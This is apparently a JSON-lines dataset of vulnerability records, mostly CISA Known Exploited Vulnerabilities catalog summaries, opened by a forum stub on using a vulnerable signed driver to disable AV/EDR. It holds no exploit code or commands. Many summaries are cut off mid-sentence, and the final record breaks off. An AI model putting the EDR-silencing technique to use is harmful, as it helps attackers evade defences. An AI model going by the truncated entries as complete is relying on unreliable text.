{"id": "f431a335aa547620a01b", "text": "BYOVD: Silencing AV/EDR with CVE-2023-52271\n\nThis topic is for discussion of the post BYOVD: Silencing AV/EDR with CVE-2023-52271 . Bring Your Own Vulnerable Device (BYOVD) is a technique used in red teaming that allows users with perform kernel-level actions by exploiting a vulnerable, legitimately signed kernel device driver. Please feel free to discuss the post and ask any questions in this topic", "cve_id": "CVE-2023-52271", "source": "0x00sec", "timestamp": ""} {"id": "CVE-2023-21529", "text": "Microsoft Exchange Server Deserialization of Untrusted Data Vulnerability\n\nAffected: Microsoft Exchange Server\n\nMicrosoft Exchange Server contains a deserialization of untrusted data that allows an authenticated attacker to achieve remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabiliti", "cve_id": "CVE-2023-21529", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36424", "text": "Microsoft Windows Out-of-Bounds Read Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Common Log File System Driver contains an out-of-bounds read vulnerability that could allow a threat actor for privileges escalation\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-125\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-36424", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-43000", "text": "Apple Multiple products Use-After-Free Vulnerability\n\nAffected: Apple Multiple Products\n\nApple macOS, iOS, iPadOS, and Safari 16.6 contain a use-after-free vulnerability due to the processing of maliciously crafted web content that may lead to memory corruption.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulne", "cve_id": "CVE-2023-43000", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-41974", "text": "Apple iOS and iPadOS Use-After-Free Vulnerability\n\nAffected: Apple iOS and iPadOS\n\nApple iOS and iPadOS contain a use-after-free vulnerability. An app may be able to execute arbitrary code with kernel privileges.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-41974", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-20775", "text": "Cisco SD-WAN Path Traversal Vulnerability\n\nAffected: Cisco SD-WAN\n\nCisco SD-WAN CLI contains a path traversal vulnerability that could allow an authenticated local attacker to gain elevated privileges via improper access controls on commands within the application CLI. A successful exploit could allow the attacker to execute arbitrary commands as the root user.\n\nRequired Action: Please adhere to CISA’s guidelines to assess exposure and mitigate risks associated with Cisco SD-WAN devices as outli", "cve_id": "CVE-2022-20775", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-52163", "text": "Digiever DS-2105 Pro Missing Authorization Vulnerability\n\nAffected: Digiever DS-2105 Pro\n\nDigiever DS-2105 Pro contains a missing authorization vulnerability which could allow for command injection via time_tzsetup.cgi.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-862\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-52163", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-37055", "text": "D-Link Routers Buffer Overflow Vulnerability\n\nAffected: D-Link Routers\n\nD-Link Routers contains a buffer overflow vulnerability that has a high impact on confidentiality, integrity, and availability. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unava", "cve_id": "CVE-2022-37055", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-48503", "text": "Apple Multiple Products Unspecified Vulnerability\n\nAffected: Apple Multiple Products\n\nApple macOS, iOS, tvOS, Safari, and watchOS contain an unspecified vulnerability in JavaScriptCore that when processing web content may lead to arbitrary code execution. The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or ", "cve_id": "CVE-2022-48503", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-50224", "text": "TP-Link TL-WR841N Authentication Bypass by Spoofing Vulnerability\n\nAffected: TP-Link TL-WR841N\n\nTP-Link TL-WR841N contains an authentication bypass by spoofing vulnerability within the httpd service, which listens on TCP port 80 by default, leading to the disclose of stored credentials. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01", "cve_id": "CVE-2023-50224", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-40799", "text": "D-Link DNR-322L Download of Code Without Integrity Check Vulnerability\n\nAffected: D-Link DNR-322L\n\nD-Link DNR-322L contains a download of code without integrity check vulnerability that could allow an authenticated attacker to execute OS level commands on the device. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud ", "cve_id": "CVE-2022-40799", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-2533", "text": "PaperCut NG/MF Cross-Site Request Forgery (CSRF) Vulnerability\n\nAffected: PaperCut NG/MF\n\nPaperCut NG/MF contains a cross-site request forgery (CSRF) vulnerability, which, under specific conditions, could potentially enable an attacker to alter security settings or execute arbitrary code. \n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-352\n\n[Source", "cve_id": "CVE-2023-2533", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-0386", "text": "Linux Kernel Improper Ownership Management Vulnerability\n\nAffected: Linux Kernel\n\nLinux Kernel contains an improper ownership management vulnerability, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.\n\nRequired Action: Apply mitigations per vendor instruct", "cve_id": "CVE-2023-0386", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-33538", "text": "TP-Link Multiple Routers Command Injection Vulnerability\n\nAffected: TP-Link Multiple Routers\n\nTP-Link TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2 contain a command injection vulnerability via the component /userRpm/WlanNetworkRpm. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue u", "cve_id": "CVE-2023-33538", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-39780", "text": "ASUS RT-AX55 Routers OS Command Injection Vulnerability\n\nAffected: ASUS RT-AX55 Routers\n\nASUS RT-AX55 devices contain an OS command injection vulnerability that could allow a remote, authenticated attacker to execute arbitrary commands. As represented by CVE-2023-41346.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploite", "cve_id": "CVE-2023-39780", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-38950", "text": "ZKTeco BioTime Path Traversal Vulnerability\n\nAffected: ZKTeco BioTime\n\nZKTeco BioTime contains a path traversal vulnerability in the iclock API that allows an unauthenticated attacker to read arbitrary files via supplying a crafted payload.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-38950", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-44221", "text": "SonicWall SMA100 Appliances OS Command Injection Vulnerability\n\nAffected: SonicWall SMA100 Appliances\n\nSonicWall SMA100 appliances contain an OS command injection vulnerability in the SSL-VPN management interface that allows a remote, authenticated attacker with administrative privilege to inject arbitrary commands as a 'nobody' user.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigati", "cve_id": "CVE-2023-44221", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-43769", "text": "Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability\n\nAffected: Hitachi Vantara Pentaho Business Analytics (BA) Server\n\nHitachi Vantara Pentaho BA Server contains a special element injection vulnerability that allows an attacker to inject Spring templates into properties files, allowing for arbitrary command execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mit", "cve_id": "CVE-2022-43769", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-43939", "text": "Hitachi Vantara Pentaho BA Server Authorization Bypass Vulnerability\n\nAffected: Hitachi Vantara Pentaho Business Analytics (BA) Server\n\nHitachi Vantara Pentaho BA Server contains a use of non-canonical URL paths for authorization decisions vulnerability that enables an attacker to bypass authorization.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE", "cve_id": "CVE-2022-43939", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-20118", "text": "Cisco Small Business RV Series Routers Command Injection Vulnerability\n\nAffected: Cisco Small Business RV Series Routers\n\nMultiple Cisco Small Business RV Series Routers contains a command injection vulnerability in the web-based management interface. Successful exploitation could allow an authenticated, remote attacker to gain root-level privileges and access unauthorized data.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, ", "cve_id": "CVE-2023-20118", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-34192", "text": "Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) contains a cross-site scripting (XSS) vulnerability that allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the pro", "cve_id": "CVE-2023-34192", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-23748", "text": "Dante Discovery Process Control Vulnerability\n\nAffected: Audinate Dante Discovery\n\nDante Discovery contains a process control vulnerability in mDNSResponder.exe that all allows for a DLL sideloading attack. A local attacker can leverage this vulnerability in the Dante Application Library to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-114\n\n[Source: CISA Known Exploited Vulnerabil", "cve_id": "CVE-2022-23748", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-48365", "text": "Qlik Sense HTTP Tunneling Vulnerability\n\nAffected: Qlik Sense\n\nQlik Sense contains an HTTP tunneling vulnerability that allows an attacker to escalate privileges and execute HTTP requests on the backend server hosting the software.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-444\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-48365", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-23227", "text": "NUUO NVRmini2 Devices Missing Authentication Vulnerability \n\nAffected: NUUO NVRmini2 Devices\n\nNUUO NVRmini2 devices contain a missing authentication vulnerability that allows an unauthenticated attacker to upload an encrypted TAR archive, which can be abused to add arbitrary users. \n\nRequired Action: The impacted product is end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue utilization of the product.\n\nCWE(s): CWE-306\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-23227", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-45727", "text": "North Grid Proself Improper Restriction of XML External Entity (XXE) Reference Vulnerability\n\nAffected: North Grid Proself\n\nNorth Grid Proself Enterprise/Standard, Gateway, and Mail Sanitize contain an improper restriction of XML External Entity (XXE) reference vulnerability, which could allow a remote, unauthenticated attacker to conduct an XXE attack.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-611\n\n", "cve_id": "CVE-2023-45727", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-28461", "text": "Array Networks AG and vxAG ArrayOS Missing Authentication for Critical Function Vulnerability\n\nAffected: Array Networks AG/vxAG ArrayOS\n\nArray Networks AG and vxAG ArrayOS contain a missing authentication for critical function vulnerability that allows an attacker to read local files and execute code on the SSL VPN gateway.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-306\n\n[Source: C", "cve_id": "CVE-2023-28461", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-25280", "text": "D-Link DIR-820 Router OS Command Injection Vulnerability\n\nAffected: D-Link DIR-820 Router\n\nD-Link DIR-820 routers contain an OS command injection vulnerability that allows a remote, unauthenticated attacker to escalate privileges to root via a crafted payload with the ping_addr parameter to ping.ccp.\n\nRequired Action: The impacted product is end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue utilization of the product.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabi", "cve_id": "CVE-2023-25280", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-21445", "text": "Oracle ADF Faces Deserialization of Untrusted Data Vulnerability\n\nAffected: Oracle ADF Faces\n\nOracle ADF Faces library, included with Oracle JDeveloper Distribution, contains a deserialization of untrusted data vulnerability leading to unauthenticated remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-21445", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-0185", "text": "Linux Kernel Heap-Based Buffer Overflow Vulnerability\n\nAffected: Linux Kernel\n\nLinux kernel contains a heap-based buffer overflow vulnerability in the legacy_parse_param function in the Filesystem Context functionality. This allows an attacker to open a filesystem that does not support the Filesystem Context API and ultimately escalate privileges.\n\nRequired Action: Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.\n\nCWE(s): CWE-190\n\n[Source: CISA ", "cve_id": "CVE-2022-0185", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-45249", "text": "Acronis Cyber Infrastructure (ACI) Insecure Default Password Vulnerability\n\nAffected: Acronis Cyber Infrastructure (ACI)\n\nAcronis Cyber Infrastructure (ACI) allows an unauthenticated user to execute commands remotely due to the use of default passwords.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-1393\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-45249", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22948", "text": "VMware vCenter Server Incorrect Default File Permissions Vulnerability \n\nAffected: VMware vCenter Server\n\nVMware vCenter Server contains an incorrect default file permissions vulnerability that allows a remote, privileged attacker to gain access to sensitive information.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-276\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22948", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-2586", "text": "Linux Kernel Use-After-Free Vulnerability\n\nAffected: Linux Kernel\n\nLinux Kernel contains a use-after-free vulnerability in the nft_object, allowing local attackers to escalate privileges. \n\nRequired Action: Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-2586", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-24816", "text": "OSGeo GeoServer JAI-EXT Code Injection Vulnerability\n\nAffected: OSGeo JAI-EXT\n\nOSGeo GeoServer JAI-EXT contains a code injection vulnerability that, when programs use jt-jiffle and allow Jiffle script to be provided via network request, could allow remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-24816", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-43208", "text": "NextGen Healthcare Mirth Connect Deserialization of Untrusted Data Vulnerability\n\nAffected: NextGen Healthcare Mirth Connect\n\nNextGen Healthcare Mirth Connect contains a deserialization of untrusted data vulnerability that allows for unauthenticated remote code execution via a specially crafted request.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vu", "cve_id": "CVE-2023-43208", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-7028", "text": "GitLab Community and Enterprise Editions Improper Access Control Vulnerability\n\nAffected: GitLab GitLab CE/EE\n\nGitLab Community and Enterprise Editions contain an improper access control vulnerability. This allows an attacker to trigger password reset emails to be sent to an unverified email address to ultimately facilitate an account takeover.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-284\n\n[Source: ", "cve_id": "CVE-2023-7028", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-38028", "text": "Microsoft Windows Print Spooler Privilege Escalation Vulnerability \n\nAffected: Microsoft Windows\n\nMicrosoft Windows Print Spooler service contains a privilege escalation vulnerability. An attacker may modify a JavaScript constraints file and execute it with SYSTEM-level permissions.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. \n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-38028", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-24955", "text": "Microsoft SharePoint Server Code Injection Vulnerability\n\nAffected: Microsoft SharePoint Server\n\nMicrosoft SharePoint Server contains a code injection vulnerability that allows an authenticated attacker with Site Owner privileges to execute code remotely.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-24955", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-48788", "text": "Fortinet FortiClient EMS SQL Injection Vulnerability\n\nAffected: Fortinet FortiClient EMS\n\nFortinet FortiClient EMS contains a SQL injection vulnerability that allows an unauthenticated attacker to execute commands as SYSTEM via specifically crafted requests.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-89\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-48788", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-21237", "text": "Android Pixel Information Disclosure Vulnerability \n\nAffected: Android Pixel\n\nAndroid Pixel contains a vulnerability in the Framework component, where the UI may be misleading or insufficient, providing a means to hide a foreground service notification. This could enable a local attacker to disclose sensitive information.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-200\n\n[Source: CISA Known Exploited Vu", "cve_id": "CVE-2023-21237", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-29360", "text": "Microsoft Streaming Service Untrusted Pointer Dereference Vulnerability\n\nAffected: Microsoft Streaming Service\n\nMicrosoft Streaming Service contains an untrusted pointer dereference vulnerability that allows for privilege escalation, enabling a local attacker to gain SYSTEM privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-822\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-29360", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-43770", "text": "Roundcube Webmail Persistent Cross-Site Scripting (XSS) Vulnerability\n\nAffected: Roundcube Webmail\n\nRoundcube Webmail contains a persistent cross-site scripting (XSS) vulnerability that can lead to information disclosure via malicious link references in plain/text messages.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-79\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-43770", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-48618", "text": "Apple Multiple Products Memory Corruption Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, and watchOS contain a time-of-check/time-of-use (TOCTOU) memory corruption vulnerability that allows an attacker with read and write capabilities to bypass Pointer Authentication.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-367\n\n[Source: CISA Known Exploited Vulnerabilities Catalo", "cve_id": "CVE-2022-48618", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-22527", "text": "Atlassian Confluence Data Center and Server Template Injection Vulnerability\n\nAffected: Atlassian Confluence Data Center and Server\n\nAtlassian Confluence Data Center and Server contain an unauthenticated OGNL template injection vulnerability that can lead to remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-74\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-22527", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-34048", "text": "VMware vCenter Server Out-of-Bounds Write Vulnerability\n\nAffected: VMware vCenter Server\n\nVMware vCenter Server contains an out-of-bounds write vulnerability in the implementation of the DCERPC protocol that allows an attacker to conduct remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-34048", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-35082", "text": "Ivanti Endpoint Manager Mobile (EPMM) and MobileIron Core Authentication Bypass Vulnerability\n\nAffected: Ivanti Endpoint Manager Mobile (EPMM) and MobileIron Core\n\nIvanti Endpoint Manager Mobile (EPMM) and MobileIron Core contain an authentication bypass vulnerability that allows unauthorized users to access restricted functionality or resources of the application.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRanso", "cve_id": "CVE-2023-35082", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-6549", "text": "Citrix NetScaler ADC and NetScaler Gateway Buffer Overflow Vulnerability\n\nAffected: Citrix NetScaler ADC and NetScaler Gateway\n\nCitrix NetScaler ADC and NetScaler Gateway contain a buffer overflow vulnerability that allows for a denial-of-service when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-119\n\n[Source:", "cve_id": "CVE-2023-6549", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-6548", "text": "Citrix NetScaler ADC and NetScaler Gateway Code Injection Vulnerability\n\nAffected: Citrix NetScaler ADC and NetScaler Gateway\n\nCitrix NetScaler ADC and NetScaler Gateway contain a code injection vulnerability that allows for authenticated remote code execution on the management interface with access to NSIP, CLIP, or SNIP.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vu", "cve_id": "CVE-2023-6548", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-29357", "text": "Microsoft SharePoint Server Privilege Escalation Vulnerability\n\nAffected: Microsoft SharePoint Server\n\nMicrosoft SharePoint Server contains an unspecified vulnerability that allows an unauthenticated attacker, who has gained access to spoofed JWT authentication tokens, to use them for executing a network attack. This attack bypasses authentication, enabling the attacker to gain administrator privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product", "cve_id": "CVE-2023-29357", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-46805", "text": "Ivanti Connect Secure and Policy Secure Authentication Bypass Vulnerability\n\nAffected: Ivanti Connect Secure and Policy Secure\n\nIvanti Connect Secure (ICS, formerly known as Pulse Connect Secure) and Ivanti Policy Secure gateways contain an authentication bypass vulnerability in the web component that allows an attacker to access restricted resources by bypassing control checks. This vulnerability can be leveraged in conjunction with CVE-2024-21887, a command injection vulnerability.\n\nRequired A", "cve_id": "CVE-2023-46805", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-23752", "text": "Joomla! Improper Access Control Vulnerability\n\nAffected: Joomla! Joomla!\n\nJoomla! contains an improper access control vulnerability that allows unauthorized access to webservice endpoints.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-23752", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-41990", "text": "Apple Multiple Products Code Execution Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, and watchOS contain an unspecified vulnerability that allows for code execution when processing a font file.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-41990", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-27524", "text": "Apache Superset Insecure Default Initialization of Resource Vulnerability\n\nAffected: Apache Superset\n\nApache Superset contains an insecure default initialization of a resource vulnerability that allows an attacker to authenticate and access unauthorized resources on installations that have not altered the default configured SECRET_KEY according to installation instructions.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailabl", "cve_id": "CVE-2023-27524", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-29300", "text": "Adobe ColdFusion Deserialization of Untrusted Data Vulnerability\n\nAffected: Adobe ColdFusion\n\nAdobe ColdFusion contains a deserialization of untrusted data vulnerability that allows for code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-29300", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-7101", "text": "Spreadsheet::ParseExcel Remote Code Execution Vulnerability\n\nAffected: Spreadsheet::ParseExcel Spreadsheet::ParseExcel\n\nSpreadsheet::ParseExcel contains a remote code execution vulnerability due to passing unvalidated input from a file into a string-type “eval”. Specifically, the issue stems from the evaluation of Number format strings within the Excel parsing logic.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE", "cve_id": "CVE-2023-7101", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-7024", "text": "Google Chromium WebRTC Heap Buffer Overflow Vulnerability\n\nAffected: Google Chromium WebRTC\n\nGoogle Chromium WebRTC, an open-source project providing web browsers with real-time communication, contains a heap buffer overflow vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could impact web browsers using WebRTC, including but not limited to Google Chrome.\n\nRequired Action: Apply mitigations per vendor instructions or d", "cve_id": "CVE-2023-7024", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-49897", "text": "FXC AE1021, AE1021PE OS Command Injection Vulnerability\n\nAffected: FXC AE1021, AE1021PE\n\nFXC AE1021 and AE1021PE contain an OS command injection vulnerability that allows authenticated users to execute commands via a network.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-49897", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-47565", "text": "QNAP VioStor NVR OS Command Injection Vulnerability\n\nAffected: QNAP VioStor NVR\n\nQNAP VioStar NVR contains an OS command injection vulnerability that allows authenticated users to execute commands via a network.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-47565", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-6448", "text": "Unitronics Vision PLC and HMI Insecure Default Password Vulnerability\n\nAffected: Unitronics Vision PLC and HMI\n\nUnitronics Vision Series PLCs and HMIs ship with an insecure default password, which if left unchanged, can allow attackers to execute remote commands.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-1188\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-6448", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-41266", "text": "Qlik Sense Path Traversal Vulnerability\n\nAffected: Qlik Sense\n\nQlik Sense contains a path traversal vulnerability that allows a remote, unauthenticated attacker to create an anonymous session by sending maliciously crafted HTTP requests. This anonymous session could allow the attacker to send further requests to unauthorized endpoints.\n\nRequired Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.\n\nRans", "cve_id": 